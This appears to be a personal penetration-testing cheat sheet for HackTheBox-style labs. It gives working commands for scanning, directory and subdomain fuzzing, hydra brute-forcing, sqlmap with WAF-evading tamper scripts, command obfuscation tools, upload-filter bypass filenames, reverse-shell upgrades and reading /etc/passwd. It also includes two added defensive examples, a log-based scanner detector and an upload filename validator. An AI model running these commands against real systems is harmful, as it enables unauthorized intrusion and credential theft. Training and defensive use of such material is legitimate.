The following tools are used for single-machine exploitation; Active Directory will be covered in another post.
Multi-threading options should be added later, since in some cases sending too many requests at the same time is not allowed (and a burst of requests is also what gets a scan noticed).
nmap -p- -v -sC -sV -O {{ip_address}}
// Additional flags
--packet-trace Shows all packets sent and received
-sU Performs a UDP scan.
-sT Performs a Full TCP scan.
-n Disables DNS resolution.
--disable-arp-ping Disables ARP ping.
-Pn Disables ICMP Echo requests.
--reason Displays the reason a port is in a particular state.
-D Cloak a scan with decoys.
nmap -n -sP 10.129.181.82/24
feroxbuster -u {{url}} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,asp -t 200
ffuf -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://94.237.60.55:43757/FUZZ -fc 404
nslookup
host
dnsenum
(takes a long time)
dnsrecon
nuclei -u {{url}}
Subdomain bruteforce:
gobuster dns -d {{url_without_protocol}} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --wildcard --timeout 20s
amass enum -d {{url_without_protocol}}
Zone transfer (AXFR):
dig axfr @{{url_without_protocol}} zonetransfer.me
gobuster vhost -u {{url}} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain --timeout 20s
whatweb -a 4 {{url}}
nikto -h {{url}} -Tuning b
Overall:
finalrecon
Hackthebox ReconSpider:
wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip
unzip ReconSpider.zip
python3 ReconSpider.py http://inlanefreight.com
whois
-> reveals information about the individual managing the server (social engineering)
nslookup
entropt@htb[/htb]$ searchsploit openssh 7.2
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Step 1: Check which characters are allowed (not filtered).
Step 2: Craft a suitable command from the allowed characters.
Advice: Don't use user-related commands (e.g. whoami, id, ...) when testing RCE, since some web applications have no user management.
// Bashfuscator Installation
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
cd ./bashfuscator/bin/
./bashfuscator -h
usage: bashfuscator [-h] [-l] ...SNIP...
optional arguments:
-h, --help show this help message and exit
Program Options:
-l, --list List all the available obfuscators, compressors, and encoders
-c COMMAND, --command COMMAND
Command to obfuscate
...SNIP...
PS> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS> cd Invoke-DOSfuscation
PS> Import-Module .\Invoke-DOSfuscation.psd1
PS> Invoke-DOSfuscation
Invoke-DOSfuscation> help
HELP MENU :: Available options shown below:
[*] Tutorial of how to use this tool TUTORIAL
...SNIP...
Choose one of the below options:
[*] BINARY Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING Environment variable encoding
[*] PAYLOAD Obfuscated payload via DOSfuscation
...SNIP...
burpsuite
// Personalized wordlist
cupp -i
sed -ri '/^.{,7}$/d' william.txt # remove passwords shorter than 8 characters
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt # remove passwords without special characters
sed -ri '/[0-9]+/!d' william.txt # remove passwords without numbers
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt {{ip_address}} -s {{port}} -u -f http-get /
hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -u -f {{ip_address}} -s {{port}} http-get /
hydra -l admin -p password -u -f service://[ip_address][:PORT][/OPT] # -l/-p take a single value, -L/-P take a wordlist file
// Format: hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt {{ip_address}} -s {{port}} -u -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
ffuf -w /usr/share/wordlists/rockyou.txt:FUZZ -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=FUZZ' -u {{url}}
ffuf or hydra can be used as the brute-force tool when there is a large number of payloads or when Burp Suite's requests get blocked.
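The directory fuzzing (feroxbuster/ffuf with -t 200 and -fc 404) and the hydra http-post-form brute force above both leave a distinctive footprint in the web server log: a burst of 404s from one IP, or a burst of POSTs to the login form that all return 200 (the failure page). This added example (not from the original page) shows a defender-side detector over constructed Apache combined-format lines; the thresholds, the /login.php path and the sample IPs are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
10.0.0.7 - - [10/May/2024:12:00:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "feroxbuster/2.10.0"
10.0.0.7 - - [10/May/2024:12:00:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "feroxbuster/2.10.0"
10.0.0.7 - - [10/May/2024:12:00:02 +0000] "GET /test.php HTTP/1.1" 404 196 "-" "feroxbuster/2.10.0"
10.0.0.9 - - [10/May/2024:12:00:05 +0000] "POST /login.php HTTP/1.1" 200 743 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:05 +0000] "POST /login.php HTTP/1.1" 200 743 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:06 +0000] "POST /login.php HTTP/1.1" 200 743 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:06 +0000] "POST /login.php HTTP/1.1" 200 743 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:00:07 +0000] "POST /login.php HTTP/1.1" 200 743 "-" "Mozilla/5.0"
192.168.1.20 - - [10/May/2024:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
# Default User-Agents of the scanners named on this page. Trivially spoofed
# (sqlmap --random-agent, ffuf -H), so treat it only as a corroborating signal.
TOOL_UA = re.compile(r"feroxbuster|ffuf|gobuster|nikto|sqlmap|wpscan|hydra", re.I)

def detect(log_text, window=60, max_404=3, max_logins=5, login_path="/login.php"):
    # Sliding per-IP window: burst of 404s (fuzzing) or of POSTs to the login
    # form (hydra http-post-form; failures return 200, so status alone is useless).
    recent = defaultdict(deque)          # (ip, kind) -> timestamps inside window
    alerts = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # skip lines that do not parse
        ip, ts, method, path, status, ua = m.groups()
        t = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if TOOL_UA.search(ua):
            alerts.add((ip, "scanner-user-agent"))
        hits = []
        if status == "404":
            hits.append(("404-burst", max_404))
        if method == "POST" and path == login_path:
            hits.append(("login-burst", max_logins))
        for kind, limit in hits:
            q = recent[(ip, kind)]
            q.append(t)
            while (t - q[0]).total_seconds() > window:
                q.popleft()              # drop events that fell out of the window
            if len(q) >= limit:
                alerts.add((ip, kind))
    return sorted(alerts)
```

Tune the thresholds to the site's normal 404 rate; a single user mistyping a URL should never trip the 404 rule.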
sqlmap -u {{url}} --level=5 --risk=3
// Useful flags
--random-agent
--os-shell
--delay
# All scripts
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
# General scripts
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
# Microsoft access
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
# Microsoft SQL Server
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MySQL
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
# Oracle
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor
# PostgreSQL
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor
# SAP MaxDB
--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor
# SQLite
--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor
// Test both AND and OR in time-based SQL injection to see which one works
...SNIP... AND SLEEP(5)
...SNIP... OR SLEEP(5)
// Change char and ext for your purpose
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
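The loop above generates the classic upload-filter bypass names (null bytes, CR/LF, path separators, the Unicode '…', double extensions). As the defender-side counterpart, this added example (not from the original page) is a filename validator that rejects every name the loop produces; the extension allowlist and the stem length limit are assumptions.

```python
import re
import unicodedata
from urllib.parse import unquote

# Allowlisted extensions (assumed upload policy for this example).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

def is_safe_upload_name(name: str) -> bool:
    """Accept only <stem>.<ext> with exactly one dot and an allowlisted ext."""
    # Fully decode percent-encoding first (up to 3 rounds, so "%2500" is caught),
    # so the name is judged on the bytes the filesystem would actually see.
    decoded = name
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # NFKC-normalise so lookalikes such as '…' (U+2026) become plain '...'.
    decoded = unicodedata.normalize("NFKC", decoded)
    if not decoded.isascii() or any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        return False                      # null bytes, CR/LF, other control chars
    if "/" in decoded or "\\" in decoded or ":" in decoded:
        return False                      # path separators / NTFS stream syntax
    # One dot only: a second dot means a hidden extension (shell.php.jpg).
    m = re.fullmatch(r"([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})", decoded)
    if not m:
        return False
    return m.group(2).lower() in ALLOWED_EXT

def wordlist_names():
    """The same names the shell loop above writes to wordlist.txt (constructed here)."""
    names = []
    for char in ['%20', '%0a', '%00', '%0d0a', '/', '.\\', '.', '\u2026', ':']:
        for ext in ['.php', '.phps']:
            names += [f"shell{char}{ext}.jpg", f"shell{ext}{char}.jpg",
                      f"shell.jpg{char}{ext}", f"shell.jpg{ext}{char}"]
    return names
```

Pair the name check with content-type sniffing and a randomly generated stored filename; never trust the client-supplied name on its own.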
wpscan
// Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; reset;
// script (writes a typescript)
script /dev/null -qc /bin/bash # /dev/null so no typescript file is stored
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; reset;
// check both shell and non-shell users
cat /etc/passwd
netstat -antp | grep -i list